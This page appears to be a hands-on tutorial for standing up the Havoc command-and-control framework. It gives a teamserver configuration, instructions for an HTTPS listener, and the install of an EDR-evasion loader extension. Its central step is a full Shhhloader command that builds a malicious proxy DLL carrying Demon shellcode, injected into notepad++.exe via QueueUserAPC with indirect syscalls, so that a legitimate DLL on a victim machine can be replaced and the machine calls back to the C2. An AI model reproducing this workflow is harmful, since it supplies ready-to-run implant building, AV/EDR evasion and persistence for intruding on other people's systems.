Practical with Havoc Framework

Teamserver Configuration

Teamserver needs a configuration profile (usually yml) to define parameters like IP, port, user and password.

Create configuration profile.

  • In the folder teamserver/data and fix and create file config.yml. Add script below.

Teamserver {
    Host = "0.0.0.0"
    Port = 40056

    Build {
        Compiler64 = "data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Operators {
    user "at19n" {
        Password = "P@ssw0rd"
    }
}

# this is optional. if you dont use it you can remove it.
Service {
    Endpoint = "service-endpoint"
    Password = "service-password"
}

Demon {
    Sleep = 2
    Jitter = 15

    TrustXForwardedFor = false

    Injection {
        Spawn64 = "C:\\Windows\\System32\\notepad.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
    }
}

Start Teamserver

Run teamserver with configuration profile

./havoc server --profile profiles/havoc.yaotl -v

Start Client

Client is graphical interface to interact with teamserver

From folder client/build, run client:

Setup Listener

Listener is the point of receiving connections from agents (Demons) on the victim machine.

In the interface client, navigate Listeners -> Create Listeners.

A configuration listener (example: HTTPS)

  • Name: at19n-test

  • Type: HTTPS

  • Host: IP Address teamserver or redirector

  • Port: 443

  • Callback Interval: Time between callbacks (example: 5s)

Save and start listener. If success, listener display status "Active"

Hands on

Install Extensions

Extensions list

After clicking install, Havoc client automatically clones the Shhhloader source from github.

Description: Shhhahoc is the name of the Shhhloader integration module into Havoc, which allows the use of advanced shellcode injection techniques to evade EDR/AV.

Fearture:

  • Use SysWhispers (SysWhispers2, SysWhispers3, GetSyscallStub) to execute syscall indirect

  • Supports injection methods like PoolParty, ThreadlessInject, ModuleStomping, QueueUserAPC, ProcessHollow.

  • Encode options shellcode and sign digital certificates to avoid detection.

Hands on

Create shellcode

Create and deployment Payload with Shhhloader

Use Shhhloader to inject demon.x64.bin shellcode into legitimate NppConverter.dll

Purpose:

  • Create a malicious DLL (NppConverter.dll) containing shellcode that creates a connect to Havoc C2

  • This DLL will be loaded by notepad++.exe on startup, execute shellcode via QueueUserAPC.

  • On the Windows machine, we will change NppConverter.dll legitimate equal a malicious DLL to activate the payload.

/usr/bin/python3 /root/Havoc/data/extensions/Shhhloader/Shhhloader.py /root/share/demon.x64.bin -sc GetSyscallStub -m QueueUserAPC -o /root/share/NppConverter.dll -dp NppConverter.dll -pp explorer.exe -p notepad++.exe

  • /root/share/demon.x64.bin: Path to Demon shellcode

  • -sc GetSyscallStub: Use GetSyscallStub syscall method to avoid EDR hook

  • -m QueueUserAPC: Shellcode injection method using QueueUserAPC

  • -o /root/share/NppConverter.dll: The output file is NppConverter.dll (a malicious DLL)

  • -dp NppConverter.dll: Create a proxy DLL based on the legitimate NppConverter.dll

  • -pp explorer.exe: The parent process is explorer.exe

  • -p notepad++.exe: The target process for shellcode injection is notepad++.exe

Hands on

Source Video

4MB
khoidong-teamserver.mp4
4MB
profiles.mp4
14MB
khoidong-client.mp4
8MB
thietlap-listener.mp4
7MB
caidat-extensions.mp4
96MB
desployment_havoc_c2_shhhloader.mp4
24MB
payload_c2.mp4
PreviousWargame CTFNextSIEM & SOC

Last updated

Was this helpful?